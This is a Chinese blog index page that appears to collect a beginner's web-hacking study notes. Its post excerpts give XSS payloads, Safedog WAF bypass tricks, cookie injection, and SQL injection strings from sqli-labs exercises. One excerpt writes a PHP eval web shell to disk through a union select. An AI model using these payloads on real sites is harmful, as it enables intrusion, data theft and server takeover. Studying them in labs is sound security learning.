• 博客园logo
  • 会员
  • 周边
  • 新闻
  • 博问
  • 闪存
  • 众包
  • 赞助商
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
sjzdest
博客园 | 首页 | 新随笔 | 新文章 | 联系 | 订阅 订阅 | 管理

2022年12月28日

xss注入小节
摘要: error事件<img src="" onerror=alert(1)><script>alert(1)</script>() = ``\u003c \u003e固定网址 加数字 onerror=alert(1)没有匹配换行符, 可以通过换行来绕过匹配表单无法逃避type="image" src=" 阅读全文
posted @ 2022-12-28 12:38 简单的小白渗透 阅读(36) 评论(0) 推荐(0)
 
安全狗绕过
摘要: 安全狗绕过的五种方法 (一)内联注释(/*![12345]*/)绕过方法: /*!select*/: 相当于没有注释 /*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。 /*![]*/: []中括号中的数字若填写则必须是5位 (二 阅读全文
posted @ 2022-12-28 12:37 简单的小白渗透 阅读(888) 评论(0) 推荐(0)
 
Cookie注入新方法
摘要: 判断一个网站是否支持cookie注入_> 现在是get ,你可以把参数放在post里面试试看看是否返回正常 用hackbar插件也行或者用burp suite改包也行 如果返回正常,说明支持cookie 接着把id=24放在cookie后面,并且用分号分隔开 也是返回正常 也可以在sqlmap里面跑 阅读全文
posted @ 2022-12-28 10:56 简单的小白渗透 阅读(135) 评论(0) 推荐(0)
 
 

2022年12月12日

sql-lib8-28
摘要: 8-22'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or''or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.t 阅读全文
posted @ 2022-12-12 13:34 简单的小白渗透 阅读(53) 评论(0) 推荐(0)
 
sql注入总汇
摘要: 网址?id=10'union select 1,database(),3 -- qweupdatexml(1,concat(0x7e,(SELECT database()),0x7e),1)union select 1,"<?php eval($_REQUEST[8])?>",3 into outf 阅读全文
posted @ 2022-12-12 13:33 简单的小白渗透 阅读(48) 评论(0) 推荐(0)
 
sql注入fuzz字典
摘要: length Length+handlerlikeLiKeselectSeleCT sleepSLEEpdatabaseDATABASedeletehavingoroRasAs-~BENCHMARKlimitLimItleftLeftselectSELECTinsertinsERTINSERTrig 阅读全文
posted @ 2022-12-12 13:31 简单的小白渗透 阅读(953) 评论(0) 推荐(0)
 
 

2022年12月3日

sql-lab 8-17 盲注加post传参
摘要: 布尔型盲注length() 函数 返回字符串的长度?id=1' and (length(database()))=8 -- qwesubstr() 截取字符串 (语法:SUBSTR(str,pos,len);) ?id=1' and (ascii(substr(database(),1,1)))=1 阅读全文
posted @ 2022-12-03 19:22 简单的小白渗透 阅读(60) 评论(0) 推荐(0)
 
 

2022年11月30日

sql-lab 1-7
摘要: 判断是否存在注入:?id=1' and 1=1 -- qwe 判断字段数:?id=1'order by 3-- qwe 判断显错位 :?id=10'union select 1,2,3 -- qwe 判断库名:?id=10'union select 1,database(),3 -- limit0, 阅读全文
posted @ 2022-11-30 20:07 简单的小白渗透 阅读(57) 评论(0) 推荐(0)
 
 

公告


博客园  ©  2004-2026
浙公网安备 33010602011771号 浙ICP备2021040463号-3